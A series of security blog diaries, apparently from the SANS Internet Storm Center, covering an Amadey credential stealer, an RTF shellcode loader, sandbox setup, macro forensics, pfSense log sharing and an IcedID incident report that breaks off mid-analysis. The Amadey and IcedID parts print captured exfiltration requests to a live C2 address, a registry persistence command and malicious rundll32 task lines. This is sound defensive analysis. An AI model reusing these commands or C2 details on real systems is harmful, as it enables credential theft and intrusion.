This morning, an interesting phishing email landed in my spam trap. The mail was redacted in Spanish and, as usual, asked the recipient to urgently process the attached document. The filename was "AVISO.001" (This extension is used by multi-volume archives). The archive contained a PE file with a very long name: AVISO11504122921827776385010767000154304736120425314155656824545860211706529881523930427.exe (SHA256:ff834f404b977a475ef56f1fa81cf91f0ac7e07b8d44e0c224861a3287f47c8c). The file is unknown on VT at this time so I did a quick analysis.

It first performs a quick review of the target and exfiltrates the collected information:

POST /7Ndd3SnW/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176[.]111[.]174[.]67
Content-Length: 83
Cache-Control: no-cache

id=152140224449&vs=2.11&sd=c5c741&os=9&bi=1&ar=1&pc=WIN7X64&un=user01&dm=&av=0&lv=0

You can see the name of the computer ("pc="), the user ("un="). No AV is running (av=0). There is an ID (randomly generated) and a version of the malware or campaign? ("vs=").

The next step is to drop itself into C:\ProgramData\011ab573a3\rween.exe. This malware is modular and downloads two DLLs located on the C2 server:

Those DLLs are known on VT [1][2]:

remnux@remnux:/MalwareZoo/20210331$ shasum -a 256 *.dll
6f917b86c623a4ef2326de062cb206208b25d93f6d7a2911bc7c10f7c83ffd64  cred.dll
3d0efa67d54ee1452aa53f35db5552fe079adfd14f1fe312097b266943dd9644  scr.dll

Persistence is achieved via a new registry key. Any shortcut created to the location pointed by a subkey Startup will launch the service during logon/reboot.

"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\011ab573a3\

DLLs are not loaded into the main program with LoadLibrary() but there are launched from rundll32:

"C:\Windows\System32\rundll32.exe" C:\ProgramData\5eba991cccd123\cred.dll, Main
"C:\Windows\System32\rundll32.exe" C:\ProgramData\5eba991cccd123\scr.dll, Main

Once the DLLs are launched, the exfiltration of data starts:

cred.dll is responsible for searching credentials. Example of probes detected:

• Outlook (HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook)
• FileZilla (C:\Users\user01\AppData\Roaming\FileZilla\sitemanager.xml)
• Purple (C:\Users\user01\AppData\Roaming\.purple\accounts.xml)

Data is then exfiltrated:

POST //7Ndd3SnW/index.php HTTP/1.1
Host: 176.111.174.67
Content-Length: 21
Content-Type: application/x-www-form-urlencoded

id=152140224449&cred=

(In my sandbox, my credentials was available)

scr.dll is used to take screenshots at regular interval and also exfiltrate them:

POST //7Ndd3SnW/index.php?scr=up HTTP/1.1
Host: 176.111.174.67
User-Agent: Uploador
Content-Type: multipart/form-data; boundary=152140224449.jpg
Connection: Keep-Alive
Content-Length: 34758

--152140224449.jpg
Content-Disposition: form-data; name="data"; filename="152140224449.jpg"
Content-Type: application/octet-stream

......JFIF.............C.......... (data removed)

Note the nice User-Agent: "Uploador". I found references to this string back in 2015![3].

Here is a screenshot of the C2 panel, a good old Amadey:

Even if the malware looks old-fashioned, it remains effective and already made some victims. I found a lot of screenshots (461) on the C2 server:

[1] https://www.virustotal.com/gui/file/6f917b86c623a4ef2326de062cb206208b25d93f6d7a2911bc7c10f7c83ffd64/detection
[2] https://www.virustotal.com/gui/file/3d0efa67d54ee1452aa53f35db5552fe079adfd14f1fe312097b266943dd9644/detection
[3] https://github.com/techbliss/Yara_Mailware_Quick_menu_scanner/blob/master/yara/malware/Derkziel_Stealer.yar
[4] https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

With the recent official deprecation of TLS 1.0 and TLS 1.1 by RFC 8996[1], a step, which has long been in preparation and which was preceded by many recommendations to discontinue the use of both protocols (as well as by the removal of support for them from all mainstream web browsers[2]), one might assume that the use of old TLS versions on the internet would have significantly decreased over the last few months. This has however not been the case.

According to Shodan, at the time of writing, TLS 1.0 and TLS 1.1 are still supported by over 50% of web servers on the internet (50.15% and 50.08% respectively). We’ll leave aside the potentially much more problematic 7.2% of web servers that still support SSL 3.0 and 1.6% of servers that support SSL 2.0...

What is interesting about the percentages for TLS 1.0 and TLS 1.1 is that both are almost the same as they were six months ago. As the following chart shows, there appeared to be a fairly significant decrease in support of both protocols between the second half of October 2020 and the end of January 2021, which was however followed by a later sharp increase, after which the percentages plateaued at around the current values.

The still significant support for TLS 1.1 and TLS 1.0 is hardly too big a problem, since, although these protocols can’t be called “secure” by today’s standards, most browsers won’t use them unless specifically configured to do so. The fact that the percentage of publicly accessible web servers, which still support the historical TLS versions, didn’t decrease significantly in the last six months is, however, certainly noteworthy.

To end on a positive note, TLS 1.3 is now supported by over 25% of web servers (25.22% to be specific), as you may have noticed in the first chart. It seems that even if old TLS versions will not leave us any time soon, support for the new and secure version of the protocol is certainly slowly increasing[3].

[1] https://datatracker.ietf.org/doc/rfc8996/?include_text=1
[2] https://en.wikipedia.org/wiki/Transport_Layer_Security#TLS_1.0
[3] https://isc.sans.edu/forums/diary/TLS+13+is+now+supported+by+about+1+in+every+5+HTTPS+servers/26936/

-----------
Jan Kopriva
@jk0pr
Alef Nula

Malware analysis is exciting because you never know what you will find. In previous diaries[1], I already explained why it's important to have a look at groups of interesting Windows API call to detect some behaviors. The classic example is code injection. Usually, it is based on something like this:

1. You allocate some memory
2. You get a shellcode (downloaded, extracted from a specific location like a section, a resource, ...)
3. You copy the shellcode in the newly allocated memory region
4. You create a new threat to execute it.

But it's not always like this! Last week, I worked on an incident involving a malicious DLL that I analyzed. The technique used to execute the shellcode was slightly different and therefore interesting to describe it here.

The DLL was delivered on the target system with an RTF document. This file contained the shellcode:

remnux@remnux:/MalwareZoo/20210318$ rtfdump.py suspicious.rtf
    1 Level  1        c=    3 p=00000000 l=    1619 h=     143;       5 b=       0   u=     539 \rtf1
    2  Level  2       c=    2 p=00000028 l=      91 h=       8;       2 b=       0   u=      16 \fonttbl
    3   Level  3      c=    0 p=00000031 l=      35 h=       3;       2 b=       0   u=       5 \f0
    4   Level  3      c=    0 p=00000056 l=      44 h=       5;       2 b=       0   u=      11 \f1
    5  Level  2       c=    0 p=00000087 l=      33 h=       0;       4 b=       0   u=       2 \colortbl
    6  Level  2       c=    0 p=000000ac l=      32 h=      13;       5 b=       0   u=       5 \*\generator
    7 Remainder       c=    0 p=00000655 l=  208396 h=   17913;       5 b=       0   u=  182176 
      Whitespace = 4878  NULL bytes = 838  Left curly braces = 832  Right curly braces = 818

This file is completely valid from an RTF format point of view, will open successfully, and render a fake document. But the attacker appended the shellcode at the end of the file (have a look at stream 7 which has a larger size and a lot of unexpected characters ("u="). Let's try to have a look at the shellcode:

remnux@remnux:/MalwareZoo/20210318$ rtfdump.py suspicious.rtf -s 7 | head -20
00000000: 0D 0A 00 6E 07 5D A7 5E  66 D2 97 1F 65 31 FD 7E  ...n.].^f...e1.~
00000010: D9 8E 9A C4 1C FC 73 79  F0 0B DA EA 6E 06 C3 03  ......sy....n...
00000020: 27 7C BD D7 23 84 0B BD  73 0C 0F 8D F9 DF CC E7  '|..#...s.......
00000030: 88 B9 97 06 A2 F9 4D 8C  91 D1 5E 39 A2 F5 9A 7E  ......M...^9...~
00000040: 4C D6 C8 A2 2D 88 D0 C4  16 E6 2B 1C DA 7B DD F7  L...-.....+..{..
00000050: C4 FB 61 34 A6 BE 8E 2F  9D 7D 96 A8 7E 00 E2 E8  ..a4.../.}..~...
00000060: BB A2 D9 53 1C F3 49 81  77 93 30 16 11 9D 88 93  ...S..I.w.0.....
00000070: D2 6C 9D 56 60 36 66 BA  29 3E 73 45 CE 1A BE E3  .l.V`6f.)>sE....
00000080: 5A C7 96 63 E0 D7 DF C9  21 2F 56 81 BD 84 6C 2D  Z..c....!/V...l-
00000090: CF 4C 4E BE 90 23 47 DC  A7 A9 8E A2 C3 A3 2E D1  .LN..#G.........

It looks encrypted and a brute force of a single XOR encoding was not successful. Let's see how it works in a debugger.

First, the RTF file is opened to get a handle and its size is fetched with GetFileSize(). Then, a classic VirtualAlloc() is used to allocate a memory space equal to the size of the file. Note the "push 40" which means that the memory will contain executable code (PAGE_EXECUTE_READWRITE):

 

Usually, the shellcode is extracted from the file by reading the exact amount of bytes. The malware jumps to the position of the shellcode start in the file and reads bytes until the EOF. In this case, the complete RTF file is read then copied into the newly allocated memory:

This is the interesting part of the code which processes the shellcode:

The first line "mov word ptr ss:[ebp-18], 658" defines where the shellcode starts in the memory map. In a loop, all characters are XOR'd with a key that is generated in the function desktop.70901100. The next step is to jump to the location of the decoded shellcode:

The address where to jump is based on the address of the newly allocated memory (0x2B30000) + the offset (658). Let's have a look at this location (0x2B30658):

Sounds good, we have a NOP sled at this location + the string "MZ". Let's execute the unconditional JMP:

We reached our shellcode! Note the NOP instructions and also the method used to get the EIP:

02B30665 | E8 00000000 | call 2B3066A | call $0
02B3066A | 5B          | pop ebx      | 

Now the shellcode will execute and perform the next stages of the infection...

[1] https://isc.sans.edu/forums/diary/Malware+Triage+with+FLOSS+API+Calls+Based+Behavior/26156

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

TCPView is a Sysinternals' tool that displays information about the TCP and UDP endpoints on a system. It's like netstat, but with a GUI.

This new version brings some major new features: service identification, creation time and searching:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

Microsoft describes the "Windows Sandbox supports simple configuration files, which provide a minimal set of customization parameters for Sandbox. [...] Windows Sandbox configuration files are formatted as XML and are associated with Sandbox via the .wsb file extension."[6]

Since both, the latest version elastic-agent (7.11+) support antivirus detection, I followed the instructions listed here [1] to configure an agent to test its detection capabilities. For my workstation, I used VMware with a fully patched Windows 10 and saved the current configuration with a snapshot. I wanted to combine both of these features; the elastic-agent and the Microsoft sandbox feature [4][5][6] to analyze my malware sample. Since the Microsoft sandbox doesn't retain anything after it is shutdown, I figure this would be a good alternative vs. restoring my previous VMware snapshot every time I tested a suspicious filename.

One minor inconvenient, if I want to use the agent, I need to add it every time to Elasticsearch to use it. If the elastic-agent isn't installed, Microsoft Defender is enabled. Here is a list of tools to either install or consider installing in the sandbox when it starts:

• Elastic-agent with malware policy (in VMware client and Sandbox client)
• MS SysMon
• MS TCPView
• Consider adding: PowerShell Script Block Logging, example here
• Wireshark to capture traffic from host
• Other browsers: Chrome & Firefox
• PeStudio
• Python
• Internet Services Simulation Suite: INetSim
• Didier Stevens suite of tools
• Proxy setup on VMware client to monitor traffic
• Any other tools you might find useful during the analysis such as this package by @mentebinaria

When starting the sandbox, using a script configured for this purpose, it can automatically load the tools needed with a batch file (MalwareAnalysis.wsb). Here is my example:

<Configuration>
  <vGPU>Enable</vGPU>
  <AudioInput>Enable</AudioInput>
  <VideoInput>Enable</VideoInput>
  <ProtectedClient>Enable</ProtectedClient>
  <MappedFolders>
    <MappedFolder>
      <HostFolder>C:\Sandbox</HostFolder>
      <ReadOnly>true</ReadOnly>
    </MappedFolder>
  </MappedFolders>
<LogonCommand>
   <Command>C:\users\WDAGUtilityAccount\Desktop\Sandbox\SBConfig.bat</Command>
</LogonCommand>
</Configuration>

Because everything is deleted when you shutdown the sandbox (including the browser, it must be reloaded with the current version every time), I needed a way to automatically start/add/load/update what I needed to perform some basic analysis. I use a batch file I preconfigured with everything I needed to accomplish this task. Here is what I have (C:\Sandbox\SBConfig.bat):

REM Copy elastic-agent to C:\Program Files
C:\Windows\System32\xcopy.exe /i /s C:\Users\WDAGUtilityAccount\Desktop\Sandbox\elastic-agent "C:\Program Files\elastic-agent"

REM Install Sysmon64, vcredist_x86
C:\Users\WDAGUtilityAccount\Desktop\Sandbox\Sysmon64.exe -i -accepteula
C:\Users\WDAGUtilityAccount\Desktop\Sandbox\vcredist_x86.exe /q

REM Add Elastic certificate authority to Sandbox
C:\Windows\System32\certutil.exe -addstore root C:\Users\WDAGUtilityAccount\Desktop\Sandbox\ca.crt
C:\Windows\System32\certutil.exe -addstore root C:\Users\WDAGUtilityAccount\Desktop\Sandbox\stargate.crt

REM Install new Microsoft Edge
start /wait C:\Users\WDAGUtilityAccount\Desktop\Sandbox\MicrosoftEdgeEnterpriseX64.msi /quiet /norestart

REM Install Python
C:\Users\WDAGUtilityAccount\Desktop\Sandbox\python-3.9.2-amd64.exe /quiet InstallAllUsers=1 PrependPath=1 Include_test=0

REM Execute PowerShell scripts
Powershell.exe -executionpolicy remotesigned -File C:\Users\WDAGUtilityAccount\Desktop\Sandbox\ChangeExecutionPolicy.ps1
Powershell.exe -executionpolicy remotesigned -File C:\Users\WDAGUtilityAccount\Desktop\Sandbox\ScriptBlockLogging.ps1

REM Install Wireshark
REM Install npcap manually. Silent only supported with OEM
C:\Users\WDAGUtilityAccount\Desktop\Sandbox\Wireshark-win64-3.4.4.exe /S /D /desktopicon=yes
C:\Users\WDAGUtilityAccount\Desktop\Sandbox\npcap-1.20.exe

The file npcap is last because I'm using the free edition vs. the OEM which will ask to finish the installation after it starts the installer. Before you can enable ScriptBlockLogging in the Sandbox, I need to enable the PowerShell ExecutionPolicy to allow RemoteSigned. This is the command in my script to make that change (ChangeExecutionPolicy.ps1):

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Force

To verify the change was applied, as PowerShell admin, execute the following command:

Get-ExecutionPolicy -List

Producing the following result:

Following the example listed here in this Elastic blog, it is time to create a policy, add the elastic-agent to Elasticsearch (pre-copied with the batch file SBConfig.bat) to run the sample file and monitor its activity. This is the four application part of the policy I configured for my agent:

After launching the script MalwareAnalysis.wsb to start the Sandbox, load, copy and install all the applications from the batch file, it is time to add the elastic-agent to the server, I am ready to launch the suspected malware file for analysis. Last month, my honeypot was uploaded a crypto miner file photo.scr and I'm going to use this file to submit the elastic-agent for analysis.

→ To view the results in Kibana, navigate Security -> Overview -> Detection alert trend
I look for activity that would indicate an alert triggered by malware and filter for the value, then View alerts to examine the flow of the activity. I can then select Analyze the content as to what this photo.scr file accessed or installed on the client. The agent captured 3 alerts:

Next is to expand one of those alerts and analyze the activity, the elastic-agent identified: 1 library, 53 networks and 7 registry:

Network Activty

Registry Activity

Each one of the can be expanded to drill further into what happened on the host.

Indicator of Compromise

SHA256
807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d  Photo.scr
[2021-02-08 07:06:36] [1693] [ftp_21_tcp 29914] [103.232.236.239:64149] info: Stored 1578496 bytes of data

Domains

stafftest[.]ru
iqtesti[.]ru
jobtests[.]ru
prtests[.]ru
qptest[.]ru
pstests[.]ru
testpsy[.]ru
profetest[.]ru
hrtests[.]ru

This is one of many tasks Windows Sandbox could be used such as accessing suspicious sites, running untrusted software and scripts starting with Windows network or vGPU disable, without the fear of impacting your normal Windows installation. These various tasks can be accomplished by creating  separate .wsb Sanbox script.

[1] https://www.elastic.co/blog/how-to-build-a-malware-analysis-sandbox-with-elastic-security
[2] https://www.elastic.co/endpoint-security/
[3] https://www.elastic.co/guide/en/security/current/install-endpoint.html
[4] https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-sandbox/windows-sandbox-overview
[5] https://techcommunity.microsoft.com/t5/windows-kernel-internals/windows-sandbox/ba-p/301849
[6] https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-sandbox/windows-sandbox-configure-using-wsb-file
[7] https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
[8] https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview
[9] https://github.com/mentebinaria/retoolkit?s=09
[10] https://www.virustotal.com/gui/file/807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d/detection
[11] https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.1

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

Microsoft Office Macros continue to be the security nightmare that they have been for the past 3 decades. System and security admins everywhere continue to try to protect their users from prevalent macro malware, but they find Microsoft's tooling often less than helpful.

Case in point, the Microsoft page that describes how to disable macros sports this useful warning:

If only life were so easy.... The only two people who will ever be "sure" what a macro is doing are its original developer, and the malware analyst who just reverse engineered it. And I'm actually even doubtful about the developer.  

Considering how shaky and often bypassed the avialable mechanisms are to control macro usage, we would expect to at least see some decent instrumentation that allows us to log, monitor and reproduce "what happened". But... no. There are hardly any useful logs. Which over the years led to a plethora of work-arounds, YARA rules, Powershell scripts, and reverse engineering. 

This week, I had the "joy" of doing a bit of the latter, while investigating an incident. One of the few places where macro execution leaves traces is in the "TrustRecords" entry in the registry:

HKCU:\SOFTWARE\Microsoft\Office\16.0\Word\Security\Trusted Documents\TrustRecords
HKCU:\SOFTWARE\Microsoft\Office\16.0\Excel\Security\Trusted Documents\TrustRecords
HKCU:\SOFTWARE\Microsoft\Office\16.0\PowerPoint\Security\Trusted Documents\TrustRecords

The version number (16.0) might vary depending on your Office installation. Whether, when and how the keys get populated also depends on the "Trust Center" setting as described in the Microsoft link above.

But in general, the registry entries will look something like this:

 

The rightmost value (00 or 7f) indicates which trust center warning the user clicked away. "00" means "Open for Editing" and "7F" means "Allow Macros to Run". The other hex values encode, amongst other data, the original creation time stamp of the file whose name is shown. This can be extremely helpful when you need to determine the exact time of original download, if the file came from a shady source. In combination with the file name, this can be the "pivot points" that you need in an incident to go hunting in proxy or email logs, to determine how that file got to the user in the first place. 

Volatility has support to extract this information, but if you are forensicating on a live system, you can also wing it with Powershell in a pinch:

$regkeys =  'HKCU:\SOFTWARE\Microsoft\Office\16.0\Word\Security\Trusted Documents\TrustRecords',
            'HKCU:\SOFTWARE\Microsoft\Office\16.0\Excel\Security\Trusted Documents\TrustRecords',
            'HKCU:\SOFTWARE\Microsoft\Office\16.0\PowerPoint\Security\Trusted Documents\TrustRecords'
foreach ($key in $regkeys) {
        try {$item = Get-Item $key -erroraction stop} catch { $item = "" }
        foreach ($line in $item.property) {
            $values = $item.getvalue($line)
            if ($values[-1] -gt 0) {$type="RUN"} else {$type="EDIT"}
            $timestamp = [datetime]::FromFileTimeUtc([System.BitConverter]::ToUint64($values,0))
            Write-Output "$line $timestamp $type"
        }
}

Yep, not exactly the most beautiful code. It ain't my fault that Microsoft insists on using 64bits for a time stamp, nor that converting such a value back into human readable time is so convoluted in Powershell :).

In my case, for the registry screenshot shown above, the Powershell spits out the following

%USERPROFILE%/Downloads/invoice%2058633.xls 03/24/2021 23:52:21 RUN
%USERPROFILE%/Downloads/Invoice%2038421.xls 03/22/2021 23:45:42 EDIT
%USERPROFILE%/Downloads/Invoice%2094377.xls 03/22/2021 21:02:04 EDIT

which tells me that the file I want is "invoice 58633.xls", because for it, Macros were allowed to run. It also gives me a timestamp for when the user made the download - March 24, 23:52 UTC. 

If you have savvy ways of keeping track of or analyzing macro execution in your environment, please let us know, or share in the comments below.

In my previous diaries, I wrote about pfSense firewalls [1], [2]. I hope the diaries have given some insight to current pfSense users, and also inspire individuals who have yet to deploy any form of information security mechanisms in their homes/personal networks to do so. At the SANS Internet Storm Center, we welcome interested participants to submit firewall logs to DShield [3]. In this diary entry, I would like to share how to do so if you are using a pfSense firewall. I also highlight some minor issues I discovered when I was trying set up the DShield pfSense client, and how to resolve them so you can send your logs to DShield successfully. Please remember to do a config backup on your pfSense firewall before changing anything, and test the changes made in a test network before deploying them into the production environment. At this point of writing, all configuration and testing were done on pfSense 2.5.0-RELEASE Community Edition.

1) Configure pfSense E-Mail Settings
E-Mail settings inside the pfSense Notifications menu have to be enabled if you want to submit your pfSense firewall logs to DShield. To navigate to the appropriate settings page, please go to “System > Advanced > Notifications”. Figure 1 shows the corresponding screenshot, and also some sample settings if you are using Google Mail. When the corresponding details have been added, scroll down and select “Save” first. After that, click on “Test SMTP Settings” and see if you received the test e-mail. Please use the e-mail address that you have registered with the SANS Internet Storm Center.

Figure 1: SMTP Settings on pfSense (Google Mail is being used here)

Note: You have to save the details before testing the SMTP settings. There is currently a bug in pfSense that loads the wrong password if you test SMTP settings and subsequently save them [4].
If you are using Google Mail, you may get an error message about SMTP failure and that the test e-mail could not be sent. Following that, you may receive an e-mail from Google that a sign-in attempt was blocked. If you follow on the error code, it will lead to a Google Account Help page that states “Less secure app access” may have to be enabled as 2-step verification is not enabled. If you do get this, please enable 2-step verification, configure an App password to use for the E-Mail settings in pfSense, and then complete Google’s Display Unlock Captcha [5]. For a detailed explanation on how to configure an App password, it can be found here [6]. It is highly not recommended to enable less secure app access, and it is always a good security practice to use two-factor authentication (2FA) when logging in to your accounts.

2) Create a new directory to store DShield files
It was recommended that the DShield files to be put at a convenient directory (/root/bin/). In a default installation of pfSense, there is no /bin directory inside /root. As such, it has to be created manually. To do so, navigate over to the pfSense WebGUI Command Prompt. To go to the page, navigate to “Diagnostics > Command Prompt”. Type in the command mkdir /root/bin/ under the “Execute Shell Command” section. Figure 2 below shows successful execution of the command.

Figure 2: Creation of /root/bin/ directory

3) Download and edit DShield pfSense Client

It is now time to prepare 2 files that are required to be copied to your pfSense firewall – dshield.php and dshield.sample (dshield.sample will have to be renamed to dshield.ini after relevant details are filled in). They can be downloaded from Johannes Ullrich’s GitHub repository over here [7]. There are multiple ways of loading these 2 files into the firewall, such as via SSH, SCP or even via a direct curl command. However, since dshield.sample has to be modified and renamed before it can be used by dshield.php, I will be modifying the files locally on a computer before uploading them via pfSense WebGUI Command Prompt page (if you prefer to modify them directly on the firewall via SSH or direct interaction via the firewall, by all means. However, I personally prefer to finalize file edits before pushing them to the firewall). With reference to Figure 3, edit lines 4, 5 and 6 of dshield.sample with your SANS Internet Storm Center details (these can be found when you go to https://isc.sans.edu/myaccount.html. Please refer to Figure 4 to see the information required for Line 4 and Line 6). You will also need to edit line 13 and input the IP address that you are sending the firewall logs from (i.e. your public IP address). This is to prevent your IP address from being blocked/reported as an offender if some outgoing traffic is blocked within your network (e.g. NTP, or some other traffic due to security policies).

Figure 3: Details to be amended in dshield.sample (to be renamed to dshield.ini)

Figure 4: User ID # and API Key Details for dshield.sample (to be renamed to dshield.ini)

You will need to ensure that the interfaces name (Line 9) matches the alias name of your WAN interface (with reference to Figure 5, and this information can be retrieved at https://<yourpfsenseipaddress>/status_interfaces.php). By default, if it was not amended when pfSense was first installed, you should not need to amend Line 9 of dshield.sample.

Figure 5: WAN Name for Line 9 in dshield.sample (to be renamed to dshield.ini)

Finally, remember to rename dshield.sample to dshield.ini (do not forget this, or else dshield.php will not work).

4) Upload dshield.php and dshield.ini to your pfSense firewall

Finally, we can now upload dshield.php and dshield.ini into your pfSense firewall. We will use the pfSense WebGUI Command Prompt page to upload the 2 files. Under the “Upload File” section, browse to where dshield.php and dshield.ini was saved on your computer and select “Upload” (please refer to Figures 6 and 7).

Figure 6: dshield.php Uploaded to pfSense Firewall

Figure 7: dshield.ini Uploaded to pfSense Firewall

They will first end up in the /tmp directory. Type in the following commands (without quotes) “mv /tmp/dshield.ini /root/bin/“ and “mv /tmp/dshield.php /root/bin/” under the “Execute Shell Command” section of the pfSense WebGUI Command Prompt page to move them into the /root/bin/ directory (Figure 8 and 9 shows the commands being executed successfully).

Figure 8: Execution of command (without quotes) “mv /tmp/dshield.ini /root/bin/“

Figure 9: Execution of command (without quotes) “mv /tmp/dshield.php /root/bin/”

5) Make dshield.php executable, and add a Cron Job

We also have to make dshield.php executable. With reference to Figure 10, the command (without quotes) “chmod +x /root/bin/dshield.php” is executed.

Figure 10: Making dshield.php Executable

Finally, to ensure that firewall logs are regularly sent to DShield, a cron job for dshield.php has to be scheduled. There are a few ways to schedule such a job. For example, you could SSH into your pfSense firewall and run the command (without quotes) “crontab -e”, and add the line (without quotes) “11,41 * * * * /root/bin/dshield.php” (this means at 11th and 41st minute of the hour, dshield.php is executed). However, if we are strictly using the pfSense WebGUI Command Prompt, “crontab -e” would not work as the WebGUI Command Prompt does not support interactive sessions. As such, we will install the “Cron” package that is located under “System > Package Manager > Available Packages”. If you had previously installed the Cron package, this step can be skipped.

Figure 11: Installing pfSense Cron Package

After Cron is installed, it can be found under “Services > Cron” (please refer to Figure 12 for an illustration).

Figure 12: Location of pfSense Cron Menu Item

Select “Add”, and fill in the corresponding details (Please refer to Figure 13 for a screenshot of the configuration):

Minute – 11,41
Hour – *
Day of the Month – *
Month of the Year – *
Day of the Week – *
User – root
Command – /root/bin/dshield.php

Figure 13: Configuration of dshield.php Cron Job

6) Configuration complete, and test dshield.php

After all the configuration has been completed, run the command (without quotes) “/root/bin/dshield.php” in the pfSense WebGUI Command Prompt. With reference to Figure 14, it shows a successful execution of dshield.php.

Figure 14: Successful execution of dshield.php

After a few minutes (it may take a while at times), you will receive an acknowledgement from admin<at>dshield[.]org and a short summary of what was submitted to DShield. Alternatively, if you did not opt in to receive an acknowledgement e-mail after submitting your firewall logs, you can also navigate to the “My Reports” tab in your Internet Storm Center account to see the logs that you have submitted (in the last 30 days). The command (input the command without quotes) “cat /tmp/lastdshieldlog” can also be executed in the pfSense WebGUI Command Prompt to check the contents of firewall logs last submitted to the SANS Internet Storm Center.

With that, your pfSense firewall has been configured to regularly submit firewall logs to DShield. Registered users also can optionally enable Fightback in their account, and log reports will be forwarded to the Internet Service Provider (ISP) where the attack originated from after analysis [8]. All DShield data is consolidated over here [9], and will benefit users globally in protecting their networks from intrusion attempts.

References:
[1] https://isc.sans.edu/diary/26766
[2] https://isc.sans.edu/diary/27102
[3] https://isc.sans.edu/howto.html
[4] https://redmine.pfsense.org/issues/10325
[5] https://accounts.google.com/DisplayUnlockCaptcha
[6] https://support.google.com/accounts/answer/185833?hl=en
[7] https://github.com/jullrich/dshieldpfsense
[8] https://isc.sans.edu/fightback.html
[9] https://isc.sans.edu/reports.html

-----------
Yee Ching Tok, ISC Handler
Personal Site
Twitter

Introduction

Yesterday's diary provided a packet capture (pcap) of approximately 20 and 1/2 hours of traffic from an infected Windows host, which included the initial infection.  It also provided malware and artifacts recovered from the infected computer.  That was presented as a traffic analysis quiz, and today's diary provides analysis of the activity.

This infection was from the recently updated version of IcedID (Bokbot) we started seeing in March 2021.  These types of infection are usually caused by malicious macros dressed in a Microsoft Office document like an Excel or Word file, such as this example from Friday 2021-03-19.

Shown above:  These documents are often as convincing as Spiderman is here.

Incident Report

Executive Summary:

On Tuesday 2021-03-16 at approximately 19:03 UTC, a Windows computer used by Maynard Constantino was infected With IcedID (Bokbot) malware.

Victim Details:

• IP address: 172.16.4.213
• MAC address: 34:64:a9:0e:b6:15
• Host name: DESKTOP-BZQ15T8
• User account name: maynard.constantino

Indicators of Compromise (IOCs):

Infection traffic:

• 188.127.235[.]244 port 80 - 188.127.235[.]244 - GET /44271.7938611111.dat
• 185.82.217[.]213 port 80 - 185.82.217[.]213 - GET /44271.7938611111.dat
• port 443 (HTTPS traffic) - aws.amazon.com - GET /   (not inherently malicious)
• 178.128.243.14 port 80 - 630mordorebiter[.]website - GET /
• 165.227.28[.]47 port 443 - iporumuski[.]fun - HTTPS traffic
• 165.227.28[.]47 port 443 - agitopinaholop[.]uno - HTTPS traffic
• 165.227.28[.]47 port 443 - dedupomoshi[.]space - HTTPS traffic
• 178.128.156[.]142 port 443 - mazaksaedr23[.]space - HTTPS traffic
• 178.128.156[.]142 port 443 - kledoapkd[.]website - HTTPS traffic
• 178.128.156[.]142 port 443 - lapoedjkeo[.]top - HTTPS traffic
• 178.128.156[.]142 port 443 - kawepotriv[.]space - HTTPS traffic

List of files recovered from the infected user's home directory:

• Kiod.hod
• Kiod.hod2
• AppData/Local/{10D90F27-F2E2-6218-7102-7745CA868DA0}/Embiteci.dll
• AppData/Local/Temp/warfare_32.tmp
• AppData/Roaming/CoverReplace/license.dat

Scheduled task recovered from infected Windows host:

rundll32.exe "C:\Users\maynard.constantino\AppData\Local\{10D90F27-F2E2-6218-7102-7745CA868DA0}\Embiteci.dll",update /i:"CoverReplace\license.dat"

Details on files extracted from the pcap:

SHA256 hash: 4f667f4267b2a1e90029ec3e66de84f0131e573087d4a0f50e4c9b5b9e0a8173

• File size: 44,544 bytes
• File location: hxxp://188.127.235[.]244/44271.7938611111.dat
• File location: hxxp://185.82.217[.]213/44271.7938611111.dat
• File location: C:\Users\maynard.constantino\Kiod.hod
• File location: C:\Users\maynard.constantino\Kiod.hod2
• File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

SHA256 hash: 91cf231431ef2cc4defc4f1ad3d149c665acc317c4a89e0188f32df259b63cef

• File size: 377,579 bytes
• File location: hxxp://630mordorebiter[.]website
• File type:  gzip compressed data, was "update_2533051401.msi", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1397480
• Note: This is an encrypted binary masquerading as a gzip file. It's not malicious on its own.

Details on files recovered from the infected Windows host:

SHA256 hash: 523bbb839a8c0524c0f372680e6abad3b9158fafa68865381fbd1380b7b934b9

• File size: 36,352 bytes
• File location: File location: C:\Users\maynard.constantino\AppData\local\Temp\warfare_32.tmp
• File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
• Run method: rundll32.exe [filename],update /i:"CoverReplace\license.dat

SHA256 hash: 47d084aab92ee591fe180613fda9ffd132b15db9b09be41ab046260cda311dc0

• File size: 36,352 bytes
• File location: C:\Users\maynard.constantino\AppData\local\{10D90F27-F2E2-6218-7102-7745CA868DA0}\Embiteci.dll
• File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
• Run method: rundll32.exe [filename],update /i:"CoverReplace\license.dat

SHA256 hash: 45b6349ee9d53278f350b59d4a2a28890bbe9f9de6565453db4c085bb5875865

• File size: 341,002 bytes
• File location: C:\Users\maynard.constantino\AppData\Roaming\CoverReplace\license.dat
• File type: data
• Note: This data binary is used by the above two DLL files

Analysis

The image below shows traffic from the pcap filtered in Wireshark to focus on the initial infection and C2 traffic.

Shown above:  Traffic from the infection filtered in Wireshark (part 1 of 2).

